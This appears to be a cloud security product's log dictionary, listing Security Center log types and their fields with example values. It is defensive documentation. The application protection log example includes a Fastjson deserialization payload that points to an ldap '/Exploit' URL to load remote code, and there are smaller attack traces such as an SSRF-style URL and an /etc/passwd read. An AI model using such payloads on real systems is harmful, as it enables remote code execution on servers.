You can view Security Center logs to identify, investigate, and handle security events at the earliest opportunity. After you purchase log storage capacity, Security Center automatically collects security logs of security events, network logs of network traffic, and host logs of host behavior. This topic describes the types of logs supported by Security Center V1.0 log dictionaries and the fields in each type of log.
Log types supported by different editions
The security capabilities and supported log types vary based on the editions of Security Center. In full protection mode, the available log types are determined by the Security Center edition you purchase. In partial protection mode, where quota management is supported, the log types are based on the Security Center edition bound to the server. The following table outlines the log types supported by different editions:
Editions | Supported log types |
Enterprise Edition and Ultimate Edition | All log types |
Anti-virus Edition and Advanced Edition | All host logs and security logs |
Unbound authorized servers |
|
Log types supported by different editions
The security capabilities and supported log types vary based on the editions of Security Center. In full protection mode, the available log types are determined by the Security Center edition you purchase. In partial protection mode, where quota management is supported, the log types are based on the Security Center edition bound to the server. The following table outlines the log types supported by different editions:
Editions | Supported log types |
Enterprise Edition and Ultimate Edition | All log types |
Anti-virus Edition and Advanced Edition | All host logs and security logs |
Unbound authorized servers |
|
Log types
Network log types
Network logs are not supported in the Outside China data management center.
Log type | __topic__ | Description | Collection cycle |
sas-log-http | Logs of user requests to web servers and responses from the web servers, including the IP address of the user, request time, request method, request URL, HTTP status code, and response size. Web access logs are used to analyze web traffic and user behavior, identify access patterns and exceptions, and optimize website performance. | In most cases, logs are collected 1 to 12 hours after the logs are generated. | |
sas-log-dns | Logs of DNS resolution details, including the requested domain name, query type, IP address of the client, and response value. You can monitor the request and response process of DNS resolution, and identify abnormal resolution behavior, DNS hijacking, and DNS poisoning based on DNS logs. | ||
local-dns | Logs of DNS queries and responses on the local DNS server, including the requested domain name, query type, IP address of the client, and response value. You can obtain the information about DNS queries in your network, and identify issues such as abnormal query behavior, domain hijacking, and DNS poisoning based on internal DNS logs. | ||
sas-log-session | Logs of network connections and data transmission, including the details of network sessions. The details include the session start time, source IP address, destination IP address, protocol, and ports. Network session logs are generally used to monitor network traffic, identify potential threats, and optimize network performance. |
Host log types
Log type | __topic__ | Description | Collection cycle |
aegis-log-login | Logs of user logons to servers, including the logon time, logon user, logon method, and logon IP address. Logon logs can help you monitor user activities, and identify and respond to abnormal behavior at the earliest opportunity. This helps ensure system security. Note Security Center does not collect the logs of logons to servers that run Windows Server 2008. | Logs are collected in real time. | |
aegis-log-network | Logs of network connections, including the 5-tuples of connections to servers, connection time, and connection status. Network connection logs can help you detect suspicious connections, identify potential network attacks, and optimize network performance. Note
| Logs are collected in real time. | |
aegis-log-process | Logs of server process startups, including the startup time, startup command, and parameters. You can obtain the startup status and configurations of server processes, and identify issues such as abnormal processes, malware intrusion, and threats based on process startup logs. | Logs are collected in real time. When a process starts, the logs are immediately collected. | |
aegis-log-crack | Logs of brute-force attacks, including information about logon attempts, and attempts to crack systems, applications, or accounts. You can obtain the information about brute-force attacks on systems or applications, and identify unusual logon attempts, weak passwords, and credential leaks based on brute-force attack logs. You can also use brute-force attack logs to trace malicious users and collect evidence to assist the security team in incident response and investigation. | Logs are collected in real time. | |
aegis-snapshot-host | Logs of accounts in systems or applications, including the basic information about accounts. The basic information includes the username, password policy, and logon history of an account. You can obtain the changes of accounts and identify potential risks at the earliest opportunity by comparing the account snapshot logs at different points in time. The risks include access from unauthorized accounts and abnormal account status. |
| |
aegis-snapshot-port | Logs of network connections, including the 5-tuples of connections, connection status, and associated processes. You can obtain the information about network sockets in the system, identify abnormal connections and potential network attacks, and optimize network performance based on network snapshot logs. | ||
aegis-snapshot-process | Logs of processes in the system, including the process ID, process name, and process start time. You can obtain the information about processes in the system and resource usage of the processes, and identify issues such as abnormal processes, excessive CPU utilization, and memory leaks based on process snapshot logs. | ||
aegis-log-dns-query | Logs of DNS requests sent by servers, including the requested domain name, query type, and query source. You can obtain the information about DNS queries in the network, and identify issues such as abnormal queries, domain hijacking, and DNS poisoning based on DNS request logs. | Logs are collected in real time. | |
aegis-log-client | Logs of online and offline events of the Security Center agent. | Logs are collected in real time. |
Security log types
Log type | __topic__ | Description | Collection cycle |
sas-vul-log | Logs of vulnerabilities that are detected in the systems or applications, including the vulnerability name, vulnerability status, and handling action. You can obtain the information about the vulnerabilities, security risks, and attack trends in the system, and take proper measures at the earliest opportunity based on vulnerability logs. | Logs are collected in real time. | |
sas-hc-log | Logs of baseline check results, including the baseline severity, baseline type, and risk level. You can obtain the baseline security status and potential risks in the system based on baseline logs. Note The logs record only the data of check items that fail the check the first time and the data of the check items that have passed the previous checks but failed a new check. | ||
sas-security-log | Logs of security events and alerts generated in the system and applications, including the alert data source, alert detail, and alert level. You can obtain the security events and threats in the system and take proper measures at the earliest opportunity based on alert logs. | ||
sas-cspm-log | Logs related to CSPM, including the check results of CSPM and the operations that add risk items to the whitelist. You can obtain the information about the errors and potential risks in the configurations of cloud services based on CSPM logs. | ||
sas-net-block | Logs of network attack events, including key information such as the attack type, source IP address, and destination IP address. You can obtain network security events and implement proper response and defense measures to improve network security and reliability based on network defense logs. | ||
sas-rasp-log | Logs of attacks on applications, including key information such as the attack type, attack pattern, and attacker IP address. You can obtain the information about the security events that occur in applications and implement proper response and defense measures to improve application security and reliability based on application protection logs. | ||
sas-filedetect-log | Logs of malicious file detection, including the file information, detection scenario, and detection result. You can identify common viruses such as ransomware and mining programs in offline files and Object Storage Service (OSS) objects, and handle the viruses at the earliest opportunity to prevent the spread and execution of malicious files based on the logs. |
Network logs
Only Security Center Enterprise and Ultimate support network logs.
Web access logs
Field name | Description | Example |
content_length | The length of the message body. Unit: bytes. | 612 |
dst_ip | The IP address of the destination host. | 39.105.XX.XX |
dst_port | The port of the destination host. | 80 |
host | The IP address or domain name of the destination host. | 39.105.XX.XX |
jump_location | The redirection address. | 123 |
method | The HTTP request method. | GET |
referer | The HTTP referer. The field contains the URL of the web page that is linked to the resource being requested. | www.example.com |
request_datetime | The time when the request is initiated. | 2023-08-07 22:42:41 |
ret_code | The HTTP status code. | 200 |
rqs_content_type | The type of the request content. | text/plain;charset=utf-8 |
rsp_content_type | The type of the response content. | text/plain; charset=utf-8 |
src_ip | The source IP address. | 31.220.XX.XX |
src_port | The source port. | 59524 |
uri | The request URI. | /report |
user_agent | The user agent that initiates the request. | okhttp/3.2.0 |
x_forward_for | The HTTP request header that records the originating IP address of the client. | 31.220.XX.XX |
DNS logs
Field name | Description | Example |
additional | The additional field that is returned by the DNS server and records information such as the CNAME record, MX record, and PTR record. | N/A |
additional_num | The number of additional records returned by the DNS server. | 0 |
answer | The DNS answer returned by the DNS server, which indicates the resolution results. A DNS answer contains the IP address to which the requested domain name is resolved or other information such as the A record and the AAAA record. | example.com A IN 52 1.2.XX.XX |
answer_num | The number of DNS answers. | 1 |
authority | The authority field returned by the DNS server. An authority is the DNS server that manages and resolves the domain name. An authority field contains information about a DNS server that provides the DNS record for the requested domain name, such as the NS record. | NS IN 17597 |
authority_num | The number of authorities. | 1 |
client_subnet | The subnet of the client. | 59.152.XX.XX |
dst_ip | The destination IP address. | 106.55.XX.XX |
dst_port | The destination port. | 53 |
in_out | The direction of data transmission. Valid values:
| out |
qid | The ID of the query. | 13551 |
qname | The domain name that is queried. | example.com |
qtype | The type of the query. | A |
query_datetime | The time of the query. | 2023-08-25 09:59:15 |
rcode | The response code returned by the DNS server, which indicates the DNS resolution result. | 0 |
region | The ID of the source region. Valid values:
| 1 |
response_datetime | The response time of the DNS server. | 2023-08-25 09:59:16 |
src_ip | The source IP address. | 106.11.XX.XX |
src_port | The source port. | 22 |
Internal DNS logs
Field name | Description | Example |
answer_rda | The resource data area (RDA) field of the DNS answer, which indicates the specific value of the resolution result. | 106.11.XX.XX |
answer_ttl | The time to live (TTL) of the DNS answer. Unit: seconds. | 600 |
answer_type | The type of the DNS answer. Valid values:
| 1 |
anwser_name | The name of the DNS answer, which indicates the domain name associated with the resource record. | example.com |
dest_ip | The destination IP address. The value is a decimal IP address by default. | 323223**** |
dest_port | The destination port. | 53 |
group_id | The group ID. The same group ID indicates the same DNS request or response. | 3 |
hostname | The name of the host. | hostname |
id | The ID of the query, which identifies a DNS request or DNS response. | 64588 |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address that is included in the DNS request or response. | 121.40.XX.XX |
ip_ttl | The TTL of the IP packet in the DNS request or response. | 64 |
query_name | The domain name that is queried. | example.com |
query_type | The type of the query. Valid values:
| 1 |
src_ip | The IP address from which the DNS request or response is initiated. The value is a decimal IP address by default. | 168427**** |
src_port | The number of the port from which the DNS request or response is initiated. | 53 |
time | The timestamp of the DNS request or response. Unit: seconds. | 1537840756 |
time_usecond | The timestamp of the DNS request or response. Unit: microseconds. | 49069 |
tunnel_id | The ID of the tunnel used by the DNS request or response. Tunneling is a way to transfer data by using different protocols. Tunneling can be used for secure access to the Internet or for communications across different networks. | 514763 |
Network session logs
Field name | Description | Example |
asset_type | The type of the asset from which the logs are collected. Valid values:
| ECS |
dst_ip | The destination IP address. | 119.96.XX.XX |
dst_port | The destination port. | 443 |
in_out | The direction of the session. The value is fixed as out.
| out |
proto | The type of the protocol. Valid values:
| tcp |
session_time | The time when the session starts. | 2023-08-15 09:59:49 |
src_ip | The source IP address. | 121.40.XX.XX |
src_port | The source port. | 53602 |
Host logs
Logon logs
Field name | Description | Example |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
ip | The IP address of the server. | 192.168.XX.XX |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
warn_ip | The IP address that is used to log on to the server. | 221.11.XX.XX |
warn_port | The port that is used to log on to the server. | 22 |
warn_type | The logon type. Valid values:
| SSH |
warn_user | The username that is used for logon. | admin |
warn_count | The number of logon attempts. The repeated logon attempts within 1 minute are recorded in one log. For example, if the value of the | 3 |
Network connection logs
Field name | Description | Example |
cmd_chain | The process chain. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | The index of the process chain. You can use an index to search for a process chain. | B184 |
container_hostname | The name of the server in the container. | nginx-ingress-controller-765f67fd4d-**** |
container_id | The container ID. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | The image ID. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | The image name. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | The container name. | nginx-ingress-**** |
container_pid | The ID of the process in the container. | 0 |
dir | The direction of the network connection. Valid values:
| in |
dst_ip | The destination IP address.
| 192.168.XX.XX |
dst_port | The destination port. | 443 |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
ip | The IP address of the server. | 192.168.XX.XX |
parent_proc_file_name | The name of the parent process file. | /usr/bin/bash |
pid | The ID of the process. | 14275 |
ppid | The parent process ID. | 14268 |
proc_name | The name of the process. | nginx |
proc_path | The path to the process. | /usr/local/nginx/sbin/nginx |
proc_start_time | The time when the process was started. | N/A |
proto | The protocol. Valid values:
| tcp |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
src_ip | The source IP address. | 100.127.XX.XX |
src_port | The source port. | 41897 |
srv_comm | The command name associated with the parent process of the parent process. | containerd-shim |
status | The status of the network connection. Valid values:
| 5 |
type | The type of the real-time network connection. Valid values:
| listen |
uid | The ID of the user who started the process. | 101 |
username | The name of the user who started the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
Process startup logs
Field name | Description | Example |
cmd_chain | The process chain. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | The index of the process chain. You can use an index to search for a process chain. | B184 |
cmd_index | The index of a parameter in the command line. Every two indexes are grouped to identify the start of a parameter and the end of the parameter. | 0,3,5,8 |
cmdline | The complete command to start the process. | ipset list KUBE-6-CLUSTER-IP |
comm | The command name related to the process. | N/A |
container_hostname | The name of the server in the container. | nginx-ingress-controller-765f67fd4d-**** |
container_id | The container ID. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | The image ID. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | The image name. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | The container name. | nginx-ingress-**** |
containerpid | The ID of the process in the container. | 0 |
cwd | The current working directory (CWD) of the process. | N/A |
filename | The name of the process file. | ipset |
filepath | The full path to the process file. | /usr/sbin/ipset |
gid | The ID of the process group. | 0 |
groupname | The name of the user group. | group1 |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
ip | The IP address of the server. | 192.168.XX.XX |
parent_cmd_line | The command line of the parent process. | /usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX |
pfilename | The name of the parent process file. | kube-proxy |
pfilepath | The full path to the parent process file. | /usr/local/bin/kube-proxy |
pid | The ID of the process. | 14275 |
ppid | The parent process ID. | 14268 |
pstime | The time when the parent process was started. | 2023-08-09 14:19:00 |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
srv_cmd | The command line of the ancestor process. | /usr/bin/containerd |
tty | The terminal that is logged on to. The value N/A indicates that the account has not been used for terminal logons. | N/A |
uid | The user ID. | 123 |
uid | The ID of the user who started the process. | 101 |
username | The name of the user who started the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
Brute-force attack logs
Field name | Description | Example |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
ip | The IP address of the server that is under a brute-force attack. | 192.168.XX.XX |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
uuid | The UUID of the server that is under a brute-force attack. | 5d83b26b-b7ca-4a0a-9267-12***** |
warn_count | The number of failed logon attempts. The repeated logon attempts within 1 minute are recorded in one log. For example, if the value of the | 3 |
warn_ip | The source IP address. | 47.92.XX.XX |
warn_port | The logon port. | 22 |
warn_type | The logon type. Valid values:
| SSH |
warn_user | The username that is used for logon. | user |
Account snapshot logs
Field name | Description | Example |
account_expire | The date when the account expires. The value never indicates that the account never expires. | never |
domain | The domain or directory to which the account belongs. The value N/A indicates that the account does not belong to a domain. | N/A |
groups | The group to which the account belongs. The value N/A indicates that the account does not belong to a group. | ["nscd"] |
home_dir | The home directory, which is the default directory to store and manage files in the system. | /Users/abc |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
ip | The IP address of the server. | 192.168.XX.XX |
last_chg | The date when the password was last changed. | 2022-11-29 |
last_logon | The date and time of the last logon that is initiated by using the account. The value N/A indicates that the account has not been used for logons. | 2023-08-18 09:21:21 |
login_ip | The IP address from which the last remote logon was initiated by using the account. The value N/A indicates that the account has not been used for logons. | 192.168.XX.XX |
passwd_expire | The date when the password expires. The value never indicates that the password never expires. | 2024-08-24 |
perm | Indicates whether the account has root permissions. Valid values:
| 0 |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
shell | The Linux shell command. | /sbin/nologin |
status | The status of the account. Valid values:
| 0 |
tty | The terminal that is logged on to. The value N/A indicates that the account has not been used for terminal logons. | N/A |
user | The name of the user. | nscd |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
warn_time | The date when you are notified of expiring passwords. The value never indicates that no notifications are sent. | 2024-08-20 |
Network snapshot logs
Field name | Description | Example |
dir | The direction of the network connection. Valid values:
| in |
dst_ip | The destination IP address.
| 192.168.XX.XX |
dst_port | The destination port. | 443 |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
ip | The IP address of the server. | 192.168.XX.XX |
pid | The ID of the process. | 682 |
proc_name | The name of the process. | sshd |
proto | The protocol. Valid values:
| tcp4 |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
src_ip | The source IP address. | 100.127.XX.XX |
src_port | The source port. | 41897 |
status | The status of the network connection. Valid values:
| 5 |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
Process snapshot logs
Field name | Description | Example |
cmdline | The complete command to start the process. | /usr/local/share/assist-daemon/assist_daemon |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
ip | The IP address of the server. | 192.168.XX.XX |
md5 | The MD5 hash value of the binary file. Note The MD5 algorithm is not supported for files that exceed 1 MB in size. | 1086e731640751c9802c19a7f53a64f5 |
name | The name of the process file. | assist_daemon |
path | The full path to the process file. | /usr/local/share/assist-daemon/assist_daemon |
pid | The ID of the process. | 1692 |
pname | The name of the parent process file. | systemd |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
start_time | The time when the process started. This is a built-in field. | 2023-08-18 20:00:12 |
uid | The ID of the user who started the process. | 101 |
username | The name of the user who started the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
DNS request logs
Field name | Description | Example |
domain | The domain name that is included in the DNS request. | example.aliyundoc.com |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
ip | The IP address of the server that initiates the DNS request. | 192.168.XX.XX |
pid | The ID of the process that initiates the DNS request. | 3544 |
ppid | The ID of the parent process that initiates the DNS request. | 3408 |
proc_cmd_chain | The chain of the process that initiates the DNS request. | "3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\"" |
proc_cmdline | The command line of the process that initiates the DNS request. | C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe |
proc_path | The path to the process that initiates the DNS request. | C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
time | The time when the DNS request is captured. In most cases, the value is the point in time when the DNS request is initiated. | 2023-08-17 20:05:04 |
uuid | The UUID of the server that initiates the DNS request. | 5d83b26b-b7ca-4a0a-9267-12**** |
Agent event logs
Field name | Description | Example |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
client_ip | The IP address of the server. | 192.168.XX.XX |
agent_version | The version of the Security Center agent. | aegis_11_91 |
last_login | The timestamp of the last logon. Unit: milliseconds. | 1716444387617 |
platform | The type of the operating system. Valid values:
| linux |
region_id | The ID of the region in which the server resides. | cn-beijing |
status | The status of the Security Center agent. Valid values:
| online |
Security logs
Vulnerability logs
Field name | Description | Example |
alias_name | The alias of the vulnerability. | CESA-2023:1335: openssl Security Update |
extend_content | The extended information about the vulnerability. | {"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]} |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the host. | 39.104.XX.XX |
intranet_ip | The private IP address of the host. | 192.168.XX.XX |
machine_name | The name of the host. | hhht-linux-*** |
name | The name of the vulnerability. | centos:7:cesa-2023:1335 |
op | The operation on the vulnerability. Valid values:
| new |
status | The status information. Valid values:
| 1 |
tag | The tag that is added to the vulnerability. Valid values:
| oval |
type | The type of the vulnerability. Valid values:
| sys |
uuid | The UUID of the server. | ad66133a-dc82-4e5e-9659-a49e3**** |
Baseline logs
Field name | Description | Example |
check_item | The name of the check item. | Set the shortest interval between password changes |
check_level | The risk level of the baseline. Valid values:
| medium |
check_type | The type of the check item. | Identity authentication |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
level | The severity of the risk item. Valid values:
| medium |
op | The operation. Valid values:
| new |
risk_name | The name of the risk item. | Password compliance check |
sas_group_name | The server group to which the server belongs in Security Center. The risk item is detected on the server. | default |
status | The status information. Valid values:
| 1 |
sub_type_alias | The alias of the subtype in Chinese. | Internationally Agreed Best Practices for Security - Ubuntu 16/18/20/22 Security Baseline Check |
sub_type_name | The name of the subtype. For more information about baseline subtypes, see Baseline types and subtypes. | hc_ubuntu16_cis_rules |
type_alias | The alias of the check type in Chinese. | Internationally Agreed Best Practices for Security |
type_name | The type of the baseline. For more information about baseline types, see Baseline types and subtypes. | cis |
uuid | The UUID of the server on which the risk item is detected. | 1ad66133a-dc82-4e5e-9659-a49e3**** |
Alert logs
Field name | Description | Example |
data_source | The data source. Valid values:
| aegis_login_log |
detail | The details of the alert. Note The value of the detail field in the log varies based on the alert type. If you have questions about the parameters in the detail field when you view alert logs, you can submit a ticket to contact technical support. | {"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"Xi'an","type":"login_common_account","displayEventName":"Log on to an ECS instance by using an unusual account","status":0} |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the host. | 39.104.XX.XX |
intranet_ip | The private IP address of the host. | 192.168.XX.XX |
level | The risk level of the alert. Valid values:
| suspicious |
name | The name of the alert. | Unusual logon - Logon to an ECS instance by using an unusual account |
op | The operation. Valid values:
| new |
status | The status of the alert. Valid values:
| 1 |
unique_info | The UUID of the alert. | 2536dd765f804916a1fa3b9516b5**** |
uuid | The UUID of the server on which the alert is generated. | ad66133a-dc82-4e5e-9659-a49e3**** |
CSPM logs
Field name | Description | Example |
check_id | The ID of the check item. You can call the ListCheckResult operation to query the IDs of check items. The operation is used to query the details of the risk items that are detected in the configuration checks on cloud services. | 11 |
check_show_name | The name of the check item. | Back-to-origin settings |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
instance_name | The name of the instance. | lsm |
instance_result | The impacts of risks. The value is a JSON string. | {"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]} |
instance_sub_type | The subtype of the instance. Valid values:
| INSTANCE |
instance_type | The type of the instance. Valid values:
| ECS |
region_id | The region ID of the instance. | cn-hangzhou |
requirement_id | The requirement item ID. You can call the ListCheckStandard operation to query the IDs of requirement items. The operation is used to query the standards of configuration checks. | 5 |
risk_level | The risk level. Valid values:
| MEDIUM |
section_id | The section ID. You can call the ListCheckResult operation to query section IDs. The operation is used to query the details of the risk items that are detected in the configuration checks on cloud services. | 1 |
standard_id | The standard ID. You can call the ListCheckStandard operation to query standard IDs. The operation is used to query the standards of configuration checks. | 1 |
status | The status of the check item. Valid values:
| PASS |
vendor | The cloud service provider. The value is fixed as ALIYUN. | ALIYUN |
Network defense logs
Field name | Description | Example |
cmd | The command line of the attacked process. | nginx: master process nginx |
cur_time | The time when the attack event occurred. | 2023-09-14 09:21:59 |
decode_payload | The decoded hexadecimal payload. | POST /Services/FileService/UserFiles/ |
dest_ip | The IP address of the attacked asset. | 172.16.XX.XX |
dest_port | The port of the attacked asset. | 80 |
func | The type of the blocked event. Valid values:
| payload |
rule_type | The type of the rule that is used in the blocked event. Valid values:
| alinet_payload |
instance_id | The instance ID of the attacked asset. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the attacked asset. | 39.104.XX.XX |
intranet_ip | The private IP address of the attacked asset. | 192.168.XX.XX |
model | The defense action. The value is fixed as block. The value indicates that the attack is blocked. | block |
payload | The hexadecimal payload. | 504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20**** |
pid | The ID of the attacked process. | 7107 |
platform | The type of the operating system of the attacked asset. Valid values:
| linux |
proc_path | The path to the attacked process. | /usr/sbin/nginx |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
src_ip | The source IP address of the attack. | 106.11.XX.XX |
src_port | The source port of the attack. | 29575 |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
Application protection logs
Field name | Description | Example |
app_dir | The directory in which the application is stored. | /usr/local/aegis/rasp/apps/1111 |
app_id | The ID of the application. | 6492a391fc9b4e2aad94**** |
app_name | The name of the application. | test |
confidence | The confidence level of the detection algorithm. Valid values:
| low |
content | The information about the request body. | {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true} |
content_length | The length of the request body. | 112 |
data | The hook. | {"cmd":"bash -c kill -0 -- -'31098' "} |
headers | The information about the request header. | {"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"} |
hostname | The name of the host or network device. | testhostname |
ip | The private IP address of the host. | 172.16.XX.XX |
is_cliped | Indicates whether the log is truncated due to an excessive length. Valid values:
| false |
jdk | The JDK version. | 1.8.0_292 |
message | The description of the alert. | Unsafe class serial. |
method | The method of the request. | Post |
os | The type of the operating system. | Linux |
os_arch | The architecture of the operating system. | amd64 |
os_version | The kernel version of the operating system. | 3.10.0-1160.59.1.el7.x86_64 |
param | The request parameter. In most cases, the parameter is in one of the following formats:
| {"url":["http://127.0.0.1.xip.io"]} |
payload | The attack payload. | bash -c kill -0 -- -'31098' |
payload_length | The length of the attack payload. | 27 |
rasp_id | The ID of the Runtime Application Self Protection (RASP) agent. | fa00223c8420e256c0c98ca0bd0d**** |
rasp_version | The version of the RASP agent. | 0.4.3 |
remote | The IP address from which the request is initiated. | 172.0.XX.XX |
result | The handling result of the alert. Valid values:
| block |
rule_result | The alert handling action that is specified in the application protection rule. Valid values:
| block |
severity | The risk level. Valid values:
| high |
stacktrace | The stack information. | [java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......] |
time | The time when the alert was generated. | 2023-10-09 15:19:15 |
timestamp | The timestamp when the alert was generated. Unit: milliseconds. | 1696835955070 |
type | The type of the vulnerability. Valid values:
| rce |
url | The request URL. | http://127.0.0.1:999/xxx |
rasp_attack_uuid | The UUID of the vulnerability. | 18823b23-7ad4-47c0-b5ac-e5f036a2**** |
uuid | The UUID of the host. | 23f7ca61-e271-4a8e-bf5f-165596a16**** |
internet_ip | The public IP address of the host. | 1.2.XX.XX |
intranet_ip | The private IP address of the host. | 172.16.XX.XX |
sas_group_name | The group to which the server belongs in Security Center. | Group 1 |
instance_id | The instance ID of the host. | i-wz995eivg28f1m** |
Malicious file detection logs
Field name | Description | Example |
bucket_name | The name of the bucket. | ***-test |
event_id | The ID of the alert. | 802210 |
event_name | The name of the alert. | Mining program |
md5 | The MD5 value of the file. | 6bc2bc******53d409b1 |
sha256 | The SHA-256 hash value of the file. | f038f9525******7772981e87f85 |
result | The detection result.
| 0 |
file_path | The path to the file. | test.zip/bin_test |
etag | The ID of the OSS object. | 6BC2B******853D409B1 |
risk_level | The risk level.
| remind |
source | The check method.
| OSS |
parent_md5 | The MD5 hash value of the parent file or the compressed package file. | 3d0f8045bb9****** |
parent_sha256 | The SHA-256 hash value of the parent file or the compressed package file. | 69b643d6******a3fb859fa |
parent_file_path | The name of the parent file or the compressed package file. | test.zip |
start_time | The timestamp when the detection starts. Unit: seconds. | 1718678414 |
Core file monitoring event log
Field name | Description | Example |
start_time | The timestamp when the event last happened. Unit: seconds. | 1718678414 |
uuid | The UUID of the server. | 5d83b26b-b**a-4**a-9267-12**** |
file_path | The path to the file. | /etc/passwd |
proc_path | The path to the process. | /usr/bin/bash |
rule_id | The ID of the hit rule. | 123 |
rule_name | The name of the rule. | file_test_rule |
cmdline | The command line. | bash /opt/a |
operation | The operation that you want to perform on the file. | READ |
risk_level | The risk level. | 2 |
pid | The process ID. | 45324 |
proc_permission | The permissions to run the process. | rwxrwxrwx |
instance_id | The instance ID. | i-wz995eivg2**** |
internet_ip | The IP address. | 192.0.2.1 |
intranet_ip | The private IP address. | 172.16.0.1 |
instance_name | The instance name. | aegis-test |
platform | The operating system type. | Linux |
Appendix
Baseline types and subtypes
Type | Subtype | Description |
hc_exploit | hc_exploit_redis | High risk exploit-Redis unauthorized access high exploit vulnerability risk |
hc_exploit_activemq | High risk exploit-ActiveMQ unauthorized access high exploit vulnerability risk | |
hc_exploit_couchdb | High risk exploit - CouchDB unauthorized access high exploit risk | |
hc_exploit_docker | High risk exploit - Docker unauthorized access high vulnerability risk | |
hc_exploit_es | High risk exploit - Elasticsearch unauthorized access high exploit vulnerability risk | |
hc_exploit_hadoop | High risk exploit - Hadoop unauthorized access high exploit vulnerability risk | |
hc_exploit_jboss | High risk exploit - Jboss unauthorized access high exploit vulnerability risk | |
hc_exploit_jenkins | High risk exploit - Jenkins unauthorized access high exploit vulnerability risk | |
